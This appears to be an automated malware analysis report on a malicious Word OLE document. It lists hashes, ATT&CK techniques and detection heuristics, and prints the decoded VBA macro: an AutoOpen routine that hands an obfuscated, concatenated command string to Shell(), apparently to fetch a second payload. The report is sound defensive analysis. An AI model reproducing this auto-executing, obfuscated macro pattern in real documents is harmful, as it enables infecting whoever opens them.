Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6f74d39d6475cdd4…

MALICIOUS

Office (OLE)

86.5 KB First seen: 2018-08-26
MD5: 413521f90f3f7f95f39fc2a994b50b30 SHA-1: e5af1f79a2ad149ca807c3d06cccf13d121decd5 SHA-256: 6f74d39d6475cdd4ee290b9ef60e1c1d9f12554076d71bb2308b4488a85ef6f4
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is an OLE file containing a VBA macro with an AutoOpen entry point. The macro utilizes the Shell() function, a critical indicator of malicious intent, to execute arbitrary commands. While the specific command string is obfuscated through concatenation and function calls, the presence of Shell() strongly suggests the macro's purpose is to download and execute a secondary payload. No specific family could be identified.

Heuristics 5

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 921 bytes
SHA-256: 964b348ff1ac9d2ecf81226727554f18ed5a16361db59a1ff8ef62b6c586e323
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "RKDQDjDuLrPG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName fVYIE
   TypeName Chr(98514 - 78697)
   TypeName CInt(97)
   TypeName Month(lHNSH / zmHhz - irMvh * KCVot)
   TypeName MbSCw
   TypeName MJQzzF
Shell# KeyString(fNGAiwqT + wGbmcqRCtQuFzp + vbKeyC + RBzPlTAFmLwo + LJwkXSjROrhl) + NZPRbrfpU + iFWARscA + QwVzdqFMc + YLJfSlnE + IvShkjqr + FDTbn + ibcGEdnRla + DuZGnJlwEo + tVUcUmVa + hnzGuzcWUIS + LkFQVSlXFLG + RzbWSzTQqjc + TEqiRBX + LwTHIMBJ + kcQDojQiau + cvUEmjowuz + oEoqBVlSS + lsILjDQNiUU + wimffii + CMXJWXfoVLP + kzOmZuwj, 134324731 - 134324731
   TypeName Sqr(cOFVP)
   TypeName (92)
   TypeName 391479084
End Sub